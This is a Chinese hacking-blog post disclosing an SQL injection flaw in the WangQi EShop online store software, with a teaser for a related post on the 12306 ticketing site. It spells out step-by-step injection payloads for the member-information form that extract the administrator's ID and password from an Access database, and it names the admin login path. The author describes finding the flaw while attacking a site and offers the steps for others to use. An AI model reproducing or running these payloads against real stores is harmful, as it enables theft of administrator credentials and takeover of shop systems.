网奇EShop网上商城系统,注射漏洞.

  • A+
所属分类:lcx

黑名单警告了.....赶紧发个洞洞解危下..
官网:http://www.wqeshop.com/
也不晓得用的人多不多..上次搞站的时候..不小心盲注出来的.
具体看过程...

注册个用户,
进入会员中心,点击“会员信息”页面进行信息修改
在表单的任何一项中都可以进入暴数据操作
管理员ID:l', Name = Cstr(DLookUp('memberid', 'admin')) + '
暴管理员密码:l', Name = Cstr(DLookUp('Password', 'member', 'memberid=1')) + '
红色的"1"字代表上一步暴出来的管理员ID
后台地址:web+/admin/
上面的方法得针对ACCESS的...当然如果是SQL的....啥都不用说了...大家都懂的.

下面是图片演示.

网奇EShop网上商城系统,注射漏洞.

网奇EShop网上商城系统,注射漏洞.

网奇EShop网上商城系统,注射漏洞.

网奇EShop网上商城系统,注射漏洞.

网奇EShop网上商城系统,注射漏洞.

文章来源于lcx.cc:网奇EShop网上商城系统,注射漏洞.

相关推荐: 12306火车票网惊现“0Day”

12306火车票网惊现"0Day" 江南的鱼 | 2013-12-26 19:23 标题党一回,快过春节了,大家也都回家看看吧! 话说,吹过的牛逼是要兑现的,去年我对这哥们说,订票还不是捏捏来的事,今天我的这哥们要我帮忙订3张票。 这不是小菜一碟嘛,祭出我们的…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: